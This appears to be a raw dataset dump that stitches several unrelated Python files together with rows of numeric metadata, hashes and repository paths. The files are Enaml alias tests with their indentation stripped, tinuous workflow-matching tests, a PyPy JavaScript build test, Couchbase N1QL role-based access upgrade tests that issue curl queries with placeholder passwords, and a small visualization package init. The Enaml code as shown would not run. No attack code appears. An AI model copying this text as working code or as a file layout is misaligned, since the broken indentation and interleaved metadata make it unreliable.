# Alias References
#------------------------------------------------------------------------------
def test_ref_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
button = main.find('button')
content = main.find('content')
assert content.pb is button
def test_ref_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb: pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
button = main.find('button')
content = main.find('content')
assert content.pb is button
def test_ref_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias foo: pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
button = main.find('button')
content = main.find('content')
assert content.foo is button
def test_ref_4():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb: pb.text
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
content = main.find('content')
assert content.pb == 'spam'
def test_ref_5():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
name = 'slider'
enamldef Content(Container):
alias other
Other: other:
pass
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
slider = main.find('slider')
content = main.find('content')
assert content.other.slider is slider
def test_ref_6():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias value: slider.value
Slider: slider:
value = 50
enamldef Content(Container):
alias other
Other: other:
pass
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
content = main.find('content')
assert content.other.value == 50
def test_ref_7():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias value: slider.value
Slider: slider:
value = 50
enamldef Content(Container):
alias value: other.value
Other: other:
pass
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
content = main.find('content')
assert content.value == 50
def test_ref_8():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
value = 50
enamldef Content(Container):
alias value: other.slider.value
Other: other:
pass
enamldef Main(Window):
Content:
name = 'content'
""")
main = compile_source(source, 'Main')()
content = main.find('content')
assert content.value == 50
#------------------------------------------------------------------------------
# Bad Alias Reference
#------------------------------------------------------------------------------
def test_bad_ref_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pc
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_ref_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pc: pd
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_ref_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pc: pb.tex
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_ref_4():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pc: pb.text.spam
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bar_ref_5():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias value: slider.value
Slider: slider:
value = 50
enamldef Content(Container):
alias value: other.valued
Other: other:
pass
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_ref_6():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
value = 50
enamldef Content(Container):
alias value: other.slider.valsue
Other: other:
pass
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Alias Binding
#------------------------------------------------------------------------------
def test_bind_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb: pb.text
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
pb = 'foo'
""")
main = compile_source(source, 'Main')()
button = main.find('button')
assert button.text == 'foo'
def test_bind_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
name = 'slider'
enamldef Content(Container):
alias value: other.slider.value
Other: other:
pass
enamldef Main(Window):
Content:
value = 50
""")
main = compile_source(source, 'Main')()
slider = main.find('slider')
assert slider.value == 50
def test_bind_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias value: slider.value
Slider: slider:
name = 'slider'
value = 50
enamldef Content(Container):
alias value: other.value
Other: other:
pass
enamldef Main(Window):
Content:
value = 42
""")
main = compile_source(source, 'Main')()
slider = main.find('slider')
assert slider.value == 42
#------------------------------------------------------------------------------
# Bad Alias Binding
#------------------------------------------------------------------------------
def test_bad_bind_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
pb = 'foo'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_bind_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias text: pb.text
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
txt = 'foo'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Extended Alias Binding
#------------------------------------------------------------------------------
def test_ex_bind_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
pb.text = 'foo'
""")
main = compile_source(source, 'Main')()
button = main.find('button')
assert button.text == 'foo'
def test_ex_bind_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
name = 'slider'
enamldef Content(Container):
alias value: other.slider
Other: other:
pass
enamldef Main(Window):
Content:
value.value = 50
""")
main = compile_source(source, 'Main')()
slider = main.find('slider')
assert slider.value == 50
def test_ex_bind_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
name = 'slider'
enamldef Content(Container):
alias value: other
Other: other:
pass
enamldef Main(Window):
Content:
value.slider.value = 42
""")
main = compile_source(source, 'Main')()
slider = main.find('slider')
assert slider.value == 42
#------------------------------------------------------------------------------
# Bad Alias Binding
#------------------------------------------------------------------------------
def test_bad_ex_bind_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
pbd.text = 'foo'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_ex_bind_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
pb.txt = 'foo'
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_ex_bind_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Other(Container):
alias slider
Slider: slider:
name = 'slider'
enamldef Content(Container):
alias value: other.slider
Other: other:
pass
enamldef Main(Window):
Content:
value.val = 50
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Alias Ordering
#------------------------------------------------------------------------------
def test_ordering():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
Field: field:
alias this_text: field.text
alias text: field.this_text
enamldef Main(Window):
Content:
pass
""")
compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Bad Alias Ordering
#------------------------------------------------------------------------------
def test_bar_ordering():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias text: field.this_text
Field: field:
alias this_text: field.text
enamldef Main(Window):
Content:
pass
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Bad Alias Override
#------------------------------------------------------------------------------
def test_bad_override_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias background
Field: background:
pass
enamldef Main(Window):
Content:
pass
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_override_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias foo
Field: foo:
pass
enamldef Content2(Content):
alias foo: bar
Field: bar:
pass
enamldef Main(Window):
Content2:
pass
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
def test_bad_override_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias foo
Field: foo:
pass
enamldef Content2(Content):
attr foo
enamldef Main(Window):
Content2:
pass
""")
with pytest.raises(TypeError):
compile_source(source, 'Main')
| 21.693005
| 79
| 0.499612
| 1,554
| 16,747
| 5.297297
| 0.058559
| 0.078231
| 0.069971
| 0.091837
| 0.935739
| 0.925777
| 0.916059
| 0.902575
| 0.89723
| 0.887755
| 0
| 0.006541
| 0.287992
| 16,747
| 771
| 80
| 21.721141
| 0.683831
| 0.134054
| 0
| 0.867537
| 0
| 0
| 0.663048
| 0
| 0
| 0
| 0
| 0
| 0.026119
| 1
| 0.067164
| false
| 0.037313
| 0.072761
| 0
| 0.139925
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb990033b20e432941ca32d17dd96d9d1f820e4a
| 1,888
|
py
|
Python
|
test/test_base.py
|
yarikoptic/tinuous
|
23bcccce77a0c118cd07f06ad1cc6ee1a4edb58e
|
[
"MIT"
] | null | null | null |
test/test_base.py
|
yarikoptic/tinuous
|
23bcccce77a0c118cd07f06ad1cc6ee1a4edb58e
|
[
"MIT"
] | null | null | null |
test/test_base.py
|
yarikoptic/tinuous
|
23bcccce77a0c118cd07f06ad1cc6ee1a4edb58e
|
[
"MIT"
] | null | null | null |
import pytest
from tinuous.base import WorkflowSpec
@pytest.mark.parametrize(
"spec,path,r",
[
(
WorkflowSpec(include=["build.yaml"], exclude=[], regex=False),
".github/workflows/build.yaml",
True,
),
(
WorkflowSpec(include=["build.yaml"], exclude=[], regex=False),
".github/workflows/build.yml",
False,
),
(
WorkflowSpec(include=[r"^build-*\.ya?ml$"], exclude=[], regex=False),
".github/workflows/build-foo.yml",
False,
),
(
WorkflowSpec(include=[r"^build-.*\.ya?ml$"], exclude=[], regex=True),
".github/workflows/build-foo.yml",
True,
),
(
WorkflowSpec(include=[r"^build-.*\.ya?ml$"], exclude=[], regex=True),
".github/workflows/build-foo.yaml",
True,
),
(
WorkflowSpec(
include=[r"^build-.*\.ya?ml$"],
exclude=[r"^build-box\.yaml$"],
regex=True,
),
".github/workflows/build-foo.yaml",
True,
),
(
WorkflowSpec(
include=[r"^build-.*\.ya?ml$"],
exclude=[r"^build-box\.yaml$"],
regex=True,
),
".github/workflows/build-box.yaml",
False,
),
(
WorkflowSpec(include=["build.yaml", "test.yml"], exclude=[], regex=True),
".github/workflows/build.yaml",
True,
),
(
WorkflowSpec(include=["build.yaml", "test.yml"], exclude=[], regex=True),
".github/workflows/test.yml",
True,
),
],
)
def test_workflowspec_match(spec: WorkflowSpec, path: str, r: bool) -> None:
assert spec.match(path) is r
| 28.606061
| 85
| 0.457627
| 165
| 1,888
| 5.224242
| 0.2
| 0.198376
| 0.185615
| 0.167053
| 0.795824
| 0.788863
| 0.759861
| 0.759861
| 0.75522
| 0.730858
| 0
| 0
| 0.370763
| 1,888
| 65
| 86
| 29.046154
| 0.725589
| 0
| 0
| 0.645161
| 0
| 0
| 0.239407
| 0.141419
| 0
| 0
| 0
| 0
| 0.016129
| 1
| 0.016129
| false
| 0
| 0.032258
| 0
| 0.048387
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbbacdd9e403395655013f562cb94f48b3ab115b
| 205
|
py
|
Python
|
pypy/translator/js/examples/djangoping/test/test_build.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 12
|
2016-01-06T07:10:28.000Z
|
2021-05-13T23:02:02.000Z
|
pypy/translator/js/examples/djangoping/test/test_build.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | null | null | null |
pypy/translator/js/examples/djangoping/test/test_build.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 2
|
2016-07-29T07:09:50.000Z
|
2016-10-16T08:50:26.000Z
|
from pypy.translator.js.main import rpython2javascript
def test_build():
from pypy.translator.js.examples.djangoping import client
assert rpython2javascript(client, ['ping_init'], use_pdb=False)
| 29.285714
| 67
| 0.790244
| 26
| 205
| 6.115385
| 0.730769
| 0.100629
| 0.226415
| 0.251572
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01105
| 0.117073
| 205
| 6
| 68
| 34.166667
| 0.867403
| 0
| 0
| 0
| 0
| 0
| 0.044118
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fbd56344777f0c659ca2d7f2d1665aecad8a0925
| 19,390
|
py
|
Python
|
pytests/tuqquery/upgrade_n1qlrbac.py
|
couchbaselabs/testrunner-bharath
|
96af90070da2140cc11c549db7403f5ea3b76d34
|
[
"Apache-2.0"
] | null | null | null |
pytests/tuqquery/upgrade_n1qlrbac.py
|
couchbaselabs/testrunner-bharath
|
96af90070da2140cc11c549db7403f5ea3b76d34
|
[
"Apache-2.0"
] | null | null | null |
pytests/tuqquery/upgrade_n1qlrbac.py
|
couchbaselabs/testrunner-bharath
|
96af90070da2140cc11c549db7403f5ea3b76d34
|
[
"Apache-2.0"
] | null | null | null |
import logging
from couchbase_helper.documentgenerator import BlobGenerator
from couchbase_helper.tuq_helper import N1QLHelper
from newupgradebasetest import NewUpgradeBaseTest
from pytests.tuqquery.n1ql_rbac_2 import RbacN1QL
from remote.remote_util import RemoteMachineShellConnection
log = logging.getLogger(__name__)
class UpgradeN1QLRBAC(RbacN1QL, NewUpgradeBaseTest):
def setUp(self):
self.array_indexing = False
super(UpgradeN1QLRBAC, self).setUp()
self.initial_version = self.input.param('initial_version', '4.6.0-3653')
self.upgrade_to = self.input.param("upgrade_to")
self.n1ql_helper = N1QLHelper(version=self.version, shell=self.shell,
use_rest=self.use_rest, max_verify=self.max_verify,
buckets=self.buckets, item_flag=self.item_flag,
n1ql_port=self.n1ql_port, full_docs_list=[],
log=self.log, input=self.input, master=self.master)
self.n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
log.info(self.n1ql_node)
if self.ddocs_num:
self.create_ddocs_and_views()
gen_load = BlobGenerator('pre-upgrade', 'preupgrade-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", self.expire_time, flag=self.item_flag)
self.query_standard_bucket = self.query_buckets[1]
def tearDown(self):
super(UpgradeN1QLRBAC, self).tearDown()
def test_offline_upgrade_with_rbac(self):
"""
1. This test is run with sasl bucket.Secondary and primay indexes are
created before upgrade.
2. After offline upgrade we make sure that queries can use these indexes for
sasl and non sasl buckets.
3. We also use pre-upgrade users for the query with indexes.
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
# create users before upgrade via couchbase-cli
self.create_users_before_upgrade_non_ldap()
self._perform_offline_upgrade()
# verify number of buckets after upgrade
self.assertTrue(len(self.buckets) == 2)
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
# verify number of users after upgrade
self.log.error(actual_result['metrics']['resultCount'])
self.assertEqual(actual_result['metrics']['resultCount'], 9)
self.create_users(users=[{'id': 'john',
'name': 'john',
'password': 'password'}])
self.query = "GRANT {0} to {1}".format("admin", 'john')
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['status'] == 'success')
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.log.error(actual_result['metrics']['resultCount'])
self.assertTrue(actual_result['metrics']['resultCount'] == 10)
self.create_users(users=[{'id': 'johnClusterAdmin',
'name': 'john',
'password': 'password'}])
self.query = "GRANT {0} to {1}".format("cluster_admin", 'johnClusterAdmin')
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['status'] == 'success')
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['metrics']['resultCount'] == 11)
self.query = "GRANT {0} on {2} to {1}".format("bucket_admin", self.query_standard_bucket, self.query_standard_bucket)
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['status'] == 'success')
self.shell = RemoteMachineShellConnection(self.master)
for query_bucket in self.query_buckets:
cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where " \
"meta().id > 0 LIMIT 10'". format('johnClusterAdmin', 'password',
self.master.ip, query_bucket, self.curl_path)
self.sleep(10)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format(query_bucket, 'johnClusterAdmin'))
# use pre-upgrade users
cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where " \
"meta().id > 0 LIMIT 10'".format('john', 'password', self.master.ip, query_bucket, self.curl_path)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format(query_bucket, 'john_admin'))
cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where " \
"meta().id > 0 LIMIT 10'".format(self.query_standard_bucket, 'password', self.master.ip,
query_bucket, self.curl_path)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format(query_bucket, self.query_standard_bucket))
def test_offline_upgrade_with_new_users(self):
"""
1. This test creates different users with different query permissions
and validates the specific permissions after upgrade.
2. We use pre-upgrade users for different queries and then change
permissions on them and verify various queries accordingly.
3. We also change permissions on new users and verify queries accordingly.
:return:
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
# create users before upgrade via couchbase-cli
self.create_users_before_upgrade_non_ldap()
self._perform_offline_upgrade()
self.sleep(20)
# verify number of buckets after upgrade
self.assertTrue(len(self.buckets) == 2)
self.query_select_insert_update_delete_helper()
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['metrics']['resultCount'] == 16)
self.check_permissions_helper()
self.create_users(users=[{'id': 'johnClusterAdmin',
'name': 'john',
'password': 'password'}])
self.query = "GRANT {0} to {1}".format("cluster_admin", 'johnClusterAdmin')
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['status'] == 'success')
cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where meta().id > 0 " \
"LIMIT 10'". \
format('johnClusterAdmin', 'password', self.master.ip, self.query_standard_bucket, self.curl_path)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format(self.query_standard_bucket, 'johnClusterAdmin'))
cmd = "{3} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from system:my_user_info'".format(
'johnClusterAdmin', 'password', self.master.ip, self.curl_path)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format('my_user_info', 'johnClusterAdmin'))
self.use_pre_upgrade_users_post_upgrade()
self.change_permissions_and_verify_pre_upgrade_users()
self.change_permissions_and_verify_new_users()
def test_offline_upgrade_with_system_catalog(self):
"""
1. This test does offline upgrade and checks various system catalog users
2. It might fail based on implementation details from dev.
:return:
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
self._perform_offline_upgrade()
self.create_and_verify_system_catalog_users_helper()
self.check_system_catalog_helper()
def test_offline_upgrade_check_ldap_users_before_upgrade(self):
"""
This test does offline upgrade and tests if users created before upgrade are working correctly after upgrade.
The users created before upgrade are verified for functionality in verify_pre_upgrade_users_permissions_helper.
Permissions for the users created before upgrade are changed after upgrade to new query based permissions in
change_pre_upgrade_users_permissions.
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
self._perform_offline_upgrade()
self.sleep(20)
self.query = 'select * from system:user_info'
actual_result = self.n1ql_helper.run_cbq_query(query=self.query, server=self.n1ql_node)
self.assertTrue(actual_result['metrics']['resultCount'] == 5)
self.verify_pre_upgrade_users_permissions_helper()
self.change_and_verify_pre_upgrade_ldap_users_permissions()
self.query_select_insert_update_delete_helper()
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['metrics']['resultCount'] == 12)
self.check_permissions_helper()
self.change_permissions_and_verify_new_users()
def test_online_upgrade_with_rebalance_with_rbac(self):
"""
# This test does the online upgrade ,validates the specific
# permissions after upgrade and verifies the number of users created are correct.
# It also verifies the queries use the correct index for sasl buckets after online upgrade.
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
# create users before upgrade via couchbase-cli
self.create_users_before_upgrade_non_ldap()
self._perform_online_upgrade_with_rebalance()
self.sleep(20)
# verify number of buckets after upgrade
self.assertTrue(len(self.buckets) == 1)
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.log.error(actual_result['metrics']['resultCount'])
# verify number of users after upgrade
self.assertTrue(actual_result['metrics']['resultCount'] == 20)
self.shell = RemoteMachineShellConnection(self.master)
self.create_users(users=[{'id': 'johnClusterAdmin',
'name': 'john',
'password': 'password'}])
self.query = "GRANT {0} to {1}".format("cluster_admin", 'johnClusterAdmin')
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['status'] == 'success')
self.create_users(users=[{'id': 'john_admin',
'name': 'john_admin',
'password': 'password'}])
self.query = "GRANT {0} to {1}".format("cluster_admin", 'john_admin')
actual_result = self.run_cbq_query(query=self.query)
self.assertTrue(actual_result['status'] == 'success')
for query_bucket in self.query_buckets:
cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where meta().id > 0 " \
"LIMIT 10'". \
format('johnClusterAdmin', 'password', self.master.ip, query_bucket, self.curl_path)
self.sleep(10)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format(query_bucket, 'johnClusterAdmin'))
# use pre-upgrade users
cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where meta().id > 0 " \
"LIMIT 10'". \
format('john_admin', 'password', self.master.ip, query_bucket, self.curl_path)
output, error = self.shell.execute_command(cmd)
self.shell.log_command_output(output, error)
self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
format(query_bucket, 'john_admin'))
def test_online_upgrade_with_rebalance_with_system_catalog(self):
"""
This test does online upgrade and checks various system catalog users
It might fail based on implementation details from dev.
:return:
"""
self._perform_online_upgrade_with_rebalance()
self.create_and_verify_system_catalog_users_helper()
self.check_system_catalog_helper()
def test_online_upgrade_with_rebalance_check_ldap_users_before_upgrade(self):
"""
This test does online upgrade and tests if users created before upgrade are working correctly after upgrade.
The users created before upgrade are verified for functionality in verify_pre_upgrade_users_permissions_helper.
Permissions for the users created before upgrade are changed after upgrade to new query based permissions in
change_pre_upgrade_users_permssions.
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
# create ldap users before upgrade
self.create_ldap_auth_helper()
self.sleep(20)
self._perform_online_upgrade_with_rebalance()
self.sleep(20)
for query_bucket in self.query_buckets:
self.query = 'create primary index on {0}'.format(query_bucket)
self.run_cbq_query(query=self.query)
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertEqual(actual_result['metrics']['resultCount'], 7,
"actual result is {0}".format(actual_result))
self.verify_pre_upgrade_users_permissions_helper(test='online_upgrade')
self.query_select_insert_update_delete_helper()
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertEqual(actual_result['metrics']['resultCount'], 14,
"actual result is {0}".format(actual_result))
def test_online_upgrade_with_failover_with_rbac(self):
"""
# This test does the online upgrade ,validates the specific
# permissions after upgrade and verifies the number of users created are correct.
# It also verifies the queries use the correct index for sasl buckets after online upgrade.
"""
# create users before upgrade via couchbase-cli
self.create_users_before_upgrade_non_ldap()
self._perform_online_upgrade_with_failover()
self.sleep(20)
# verify number of buckets after upgrade
self.assertTrue(len(self.buckets) == 2)
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertEqual(actual_result['metrics']['resultCount'], 23,
"actual result is {0}".format(actual_result))
self.query_select_insert_update_delete_helper()
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertEqual(actual_result['metrics']['resultCount'], 23,
"actual result is {0}".format(actual_result))
self.check_permissions_helper()
self.change_permissions_and_verify_new_users()
def test_online_upgrade_with_failover_with_system_catalog(self):
"""
This test does online upgrade and checks various system catalog users
It might fail based on implementation details from dev.
:return:
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query, server=self.n1ql_node)
self._perform_online_upgrade_with_rebalance()
self.sleep(20)
self.create_and_verify_system_catalog_users_helper()
self.check_system_catalog_helper()
def test_online_upgrade_with_failover_check_ldap_users_before_upgrade(self):
"""
This test does online upgrade and tests if users created before upgrade are working correctly after upgrade.
The users created before upgrade are verified for functionality in verify_pre_upgrade_users_permissions_helper.
Permissions for the users created before upgrade are changed after upgrade to new query based permissions in
change_pre_upgrade_users_permssions.
"""
for query_bucket in self.query_buckets:
self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
self.run_cbq_query(query=self.query)
# create ldap users before upgrade
self.create_ldap_auth_helper()
self._perform_online_upgrade_with_failover()
self.sleep(20)
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query, server=self.n1ql_node)
self.assertEqual(actual_result['metrics']['resultCount'], 23)
self.change_and_verify_pre_upgrade_ldap_users_permissions()
self.query_select_insert_update_delete_helper()
self.query = 'select * from system:user_info'
actual_result = self.run_cbq_query(query=self.query)
self.assertEqual(actual_result['metrics']['resultCount'], 23)
self.check_permissions_helper()
self.change_permissions_and_verify_new_users()
| 57.029412
| 134
| 0.651934
| 2,407
| 19,390
| 5.025758
| 0.089738
| 0.059519
| 0.033562
| 0.037034
| 0.859965
| 0.830867
| 0.80119
| 0.769364
| 0.758618
| 0.739688
| 0
| 0.013832
| 0.246828
| 19,390
| 339
| 135
| 57.19764
| 0.814503
| 0.159876
| 0
| 0.702811
| 0
| 0.028112
| 0.189925
| 0
| 0
| 0
| 0
| 0
| 0.120482
| 1
| 0.048193
| false
| 0.048193
| 0.024096
| 0
| 0.076305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbd7c5e6201afffc1fd5e6e07beb71a9a0b04636
| 223
|
py
|
Python
|
src/visualization/__init__.py
|
ri-heme/02456
|
9d25d256eb836b86bbfb323b0851c74ced7b55ee
|
[
"FTL"
] | 1
|
2022-01-17T14:12:39.000Z
|
2022-01-17T14:12:39.000Z
|
src/visualization/__init__.py
|
ri-heme/02456
|
9d25d256eb836b86bbfb323b0851c74ced7b55ee
|
[
"FTL"
] | null | null | null |
src/visualization/__init__.py
|
ri-heme/02456
|
9d25d256eb836b86bbfb323b0851c74ced7b55ee
|
[
"FTL"
] | null | null | null |
__all__ = ["generate_projection", "plot_grid", "plot_metrics", "plot_projection"]
from src.visualization.metrics import plot_grid, plot_metrics
from src.visualization.projection import plot_projection, generate_projection
| 44.6
| 81
| 0.834081
| 27
| 223
| 6.444444
| 0.37037
| 0.206897
| 0.137931
| 0.218391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076233
| 223
| 4
| 82
| 55.75
| 0.84466
| 0
| 0
| 0
| 1
| 0
| 0.246637
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
